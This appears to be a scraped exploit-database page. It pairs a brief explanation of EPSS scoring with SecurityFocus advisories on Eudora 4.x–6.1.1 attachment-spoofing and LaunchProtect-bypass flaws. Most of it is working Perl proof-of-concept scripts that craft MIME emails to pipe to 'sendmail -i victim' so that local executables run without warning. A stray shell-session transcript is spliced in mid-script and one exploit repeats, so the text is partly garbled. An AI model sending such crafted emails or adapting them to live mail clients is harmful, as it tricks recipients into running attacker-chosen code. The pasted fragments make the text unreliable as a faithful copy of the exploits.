The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

source: https://www.securityfocus.com/bid/1157/info A malicious email sender can circumvent warning messages that would normally display when a user attempts to view executable attachments in Eudora 4.2/4.3. Eudora does not prompt a user with the warning message if they are attempting to open a file that is neither .exe, .com, or .bat. Inserting the tag http ://www.example.com in an email message will display as: http ://www.example.com in a Eudora email client. Therefore, when a user clicks on this link, it will automatically open up the executable file without warning.

source: https://www.securityfocus.com/bid/7653/info Eudora is reported to be prone to an issue which may allow attackers to spoof the file extension in an attachment. This may aid an attacker in enticing a user of the e-mail client into executing malicious content. It is possible to refer to other files or attachments in a message through specially formatted inline text. If the CR (carriage return) character (0x0D, Ctrl-M) is embedded anywhere in the 'Attachment Converted' string, it is possible to execute message attachments without further user interaction. #!/usr/bin/perl -- use MIME::Base64; print "From: me\n"; print "To: you\n"; print "Subject: Eudora 6.0 on Windows exploit\n"; print "MIME-Version: 1.0\n"; print "Content-Type: multipart/mixed; boundary=\"zzz\"\n"; print "\n"; print "This is a multi-part message in MIME format.\n"; print "--zzz\n"; print "Content-Type: text/plain\n"; print "Content-Transfer-Encoding: 7bit\n"; print "\n"; print "Pipe the output of this script into: sendmail -i victim\n"; print "\nQuestion: Besides In.mbx, Eudora 6.0 also keeps In.mbx.001 and In.mbx.002 files. Any way to turn this wasteful feature off?\n"; print "\nWith spoofed attachments, we could 'steal' files if the message was forwarded (not replied to).\n"; print "\nSending a long filename e.g.:\n"; print "Attachment Converted\r: \"\\AAA...AAA\"\n"; print "(with 250 or so repetitions of \"A\") makes Eudora crash. Eudora is then unable to start, until the offending message is removed from In.mbx (using some utility other than Eudora itself). This buffer overflow can easily be made into an execute-any-code exploit (but is not shown here for script kiddies).\n"; print "\nWithin plain-text email (or plain-text, inline MIME parts) embedded CR=x0d characters get converted internally into a NUL=x00 and ignored, so we can spoof \"attachment converted\" lines:\n"; print "\nThe following work fine (but are boring and/or put up warnings):\n"; print "Attachment Converted\r: \"c:\\winnt\\system32\\calc.exe\"\n"; print "Attachment Converted\r: c:\\winnt\\system32\\calc.exe\n"; print "(Note how JavaScript is done with IE, web with default browser Netscape)\n"; print "Attachment Converted\r: hello.txt\n"; print "Attachment Converted\r: web.txt\n"; print "Attachment Converted\r: file.txt\n"; print "\nIf we can guess the full path to the attach directory then can change the name shown to anything we like, but get broken icon:\n"; print "Attachment Converted\r: file.txt\n"; print "\nCuteness value only:\n"; print "Attachment Converted\r: file1.txt xyz file2.txt\n"; print "\n With HTML inclusions we can do file, http and javascript references. Any way to exploit this? \n"; print "\n Can also do RTF inclusions. Can this be abused? \n"; print "\nThose constructs allow spoofing attachments easily, without embedded CR:\n\n"; print "HTML\n"; print "Attachment Converted: \"xyz\"\n"; print "Rich\n"; print "Attachment Converted: \"xyz\"\n"; print "Flowed\n"; print "Attachment Converted: \"xyz\"\n"; print "\n"; print "\n--zzz\n"; print "Content-Type: text/plain; name=\"plain.txt\"\n"; print "Content-Transfer-Encoding: 7bit\n"; print "Content-Disposition: inline; filename=\"plain.txt\"\n"; print "\n"; print "Within a 'plain' attachment:\n"; print "Attachment Converted\r: \"c:\\winnt\\system32\\calc.exe\"\n"; print "\n--zzz\n"; print "Content-Type: text/plain; name=\"qp.txt\"\n"; print "Content-Transfer-Encoding: quoted-printable \n"; print "Content-Disposition: inline; filename=\"qp.txt\"\n"; print "\n"; print "Within quoted-printable encoded parts still need the embedded CR:\n"; print "=41ttachment=20=43onverted\r=3a \"c:\\winnt\\system32\\calc.exe\"\n"; print "\n--zzz\n"; print "Content-Type: text/plain; name=\"b64.txt\"\n"; print "Content-Transfer-Encoding: base64\n"; print "Content-Disposition: inline; filename=\"b64.txt\"\n"; print "\n"; $z = "Within base64 encoded (plain-text, inline) MIME parts, can spoof\r without embedded CR (but line termination is CR-NL):\r Attachment Converted: \"c:\\winnt\\system32\\calc.exe\"\r\n"; print encode_base64($z); print "\n--zzz--\n"; print "\n";

source: https://www.securityfocus.com/bid/9101/info A problem has been identified in the implementation of LaunchProtect within Eudora. Because of this, it may be possible to trick users into performing dangerous actions. ** May 21, 2004 - Eudora version 6.1.1 has been released, however, it is reported that the new versions is vulnerable to this issue as well. #!/usr/bin/perl -- use MIME::Base64; print "From: me\n"; print "To: you\n"; print "Subject: Eudora 6.0.1 on Windows spoof, LaunchProtect\n"; print "\n"; print "Pipe the output of this script into: sendmail -i victim\n"; print " Eudora 6.0.1 LaunchProtect handles the X-X.exe dichotomy in the attach directory only, and allows spoofed attachments pointing to an executable stored elsewhere to run without warning:\n"; print "Attachment Converted\r: go.txt\n"; print "Attachment Converted\r: c:/winnt/system32/calc\n"; $X = 'README'; $Y = "$X.bat"; print "\nThe X - X.exe dichotomy: send a plain $X attachment:\n"; $z = "rem Funny joke\r\npause\r\n"; flynn@mail:~$ ls 814BlackoutReport.pdf administrivia code flying leth.txt mergemail.pl sfmutt.tgz syngress Maildir backfill.txt docs flynn mail pics src ware admin check eudora-launchprotex.pl igss.txt malcode.txt scripts survey flynn@mail:~$ cat eudora-launchprotex.pl #!/usr/bin/perl -- use MIME::Base64; print "From: me\n"; print "To: you\n"; print "Subject: Eudora 6.0.1 on Windows spoof, LaunchProtect\n"; print "\n"; print "Pipe the output of this script into: sendmail -i victim\n"; print " Eudora 6.0.1 LaunchProtect handles the X-X.exe dichotomy in the attach directory only, and allows spoofed attachments pointing to an executable stored elsewhere to run without warning:\n"; print "Attachment Converted\r: go.txt\n"; print "Attachment Converted\r: c:/winnt/system32/calc\n"; $X = 'README'; $Y = "$X.bat"; print "\nThe X - X.exe dichotomy: send a plain $X attachment:\n"; $z = "rem Funny joke\r\npause\r\n"; print "begin 600 $X\n", pack('u',$z), "`\nend\n"; print "\nand (in another message or) after some blurb so is scrolled off in another screenful, also send $Y. Clicking on $X does not get it any more (but gets $Y, with a LauchProtect warning):\n"; $z = "rem Big joke\r\nrem Should do something nasty\r\npause\r\n"; print "begin 600 $Y\n", pack('u',$z), "`\nend\n"; print " Can be exploited if there is more than one way into attach: in my setup H: and \\\\rome\\home are the same thing, but Eudora does not know that.\n"; print "These elicit warnings:\n"; print "Attachment Converted\r: readme\n"; print "Attachment Converted\r: h:/eudora/attach/README\n"; print "while these do the bad thing without warning:\n"; print "Attachment Converted\r: readme\n"; print "Attachment Converted\r: //rome/home/eudora/attach/README\n"; print "Attachment Converted\r: \\\\rome\\home\\eudora\\attach\\README\n"; print " For the default setup, Eudora knows that C:\\Program Files and C:\\Progra~1 are the same thing...\n"; print "Attachment Converted\r: \"c:/program files/qualcomm/eudora/attach/README\"\n"; print "Attachment Converted\r: \"c:/progra~1/qualcomm/eudora/attach/README\"\n"; print "\n";

source: https://www.securityfocus.com/bid/9101/info A problem has been identified in the implementation of LaunchProtect within Eudora. Because of this, it may be possible to trick users into performing dangerous actions. ** May 21, 2004 - Eudora version 6.1.1 has been released, however, it is reported that the new versions is vulnerable to this issue as well. #!/usr/bin/perl -- use MIME::Base64; print "From: me\n"; print "To: you\n"; print "Subject: Eudora 6.1.1 on Windows spoof, LaunchProtect\n"; print "MIME-Version: 1.0\n"; print "Content-Type: multipart/mixed; boundary=\"zzz\"\n"; print "X-Use: Pipe the output of this script into: sendmail -i victim\n\n"; print "This is a multi-part message in MIME format.\n"; print "--zzz\n"; print "Content-Type: text/plain\n"; print "Content-Transfer-Encoding: 7bit\n"; print "\n"; print "With spoofed attachments, we could 'steal' files if the message was forwarded (not replied to).\n"; #print " #(Within plain-text email (or plain-text, inline MIME parts) embedded #CR=x0d characters used to get converted internally into a NUL=x00 and #ignored, so we could spoof \"attachment converted\" lines. #At version 6.1.1, embedded CR seem to get converted into NL=x0a.)\n"; print "\nThe constructs (x-html, x-rich or x-flowed) allow spoofing attachments easily. The following work fine (but put up warnings):\n"; print "Attachment Converted: \"c:\\winnt\\system32\\calc.exe\"\n"; print "Attachment Converted: c:\\winnt\\system32\\calc.exe\n"; print "Attachment Converted: file.exe\n"; print "These have broken icons, but execute without warning:\n"; print "Attachment Converted: \"c:\\winnt\\system32\\calc\"\n"; print "Attachment Converted: c:\\winnt\\system32\\calc\n"; print "Attachment Converted: file\n"; print "\n With HTML inclusions we can do file.exe (get warning)
and plain file (no warning) references.
(Or can do http and javascript references; the latter
seems to run with IE, regardless of default browser settings.). \n"; print "\n\n Can also do RTF inclusions. Can that be abused? \n\n"; print "\n--zzz\n"; print "Content-Type: text/plain; name=\"b64.txt\"\n"; print "Content-Transfer-Encoding: base64\n"; print "Content-Disposition: inline; filename=\"b64.txt\"\n"; print "\n"; $z = "Can no longer spoof attachments in quoted-printable parts, but\r still can within base64 encoded (plain-text, inline) MIME parts:\r Attachment Converted: \"c:\\winnt\\system32\\calc.exe\"\r Attachment Converted: \"c:\\winnt\\system32\\calc\"\r\n"; print encode_base64($z); print "\n--zzz\n"; print "Content-Type: text/plain\n"; print "Content-Transfer-Encoding: 7bit\n"; print "\n"; $X = 'README'; $Y = "$X.bat"; print "\n\n\nThe X - X.exe dichotomy: send a plain $X attachment:\n"; $z = "rem Funny joke\r\npause\r\n"; print "begin 600 $X\n", pack('u',$z), "`\nend\n"; print "\nand (in another message or after some blurb so is scrolled off in another screenful) also send $Y. Clicking on $X does not get it any more, but gets $Y and runs without any warning:\n"; $z = "rem Big joke\r\nrem Should do something nasty\r\npause\r\n"; print "begin 600 $Y\n", pack('u',$z), "`\nend\n"; #print "\nIf we can guess the full path to the attach directory then can #change the name shown to anything we like, but get broken icon:\n"; #print "Attachment Converted: attach\\README\n"; #print "Attachment Converted: file.txt\n"; #print "\nFunny: I thought that since version 6.0, LaunchProtect handled #the X-X.exe dichotomy (in the attach directory only)...\n"; print "\n"; print "\n--zzz--\n"; print "\n";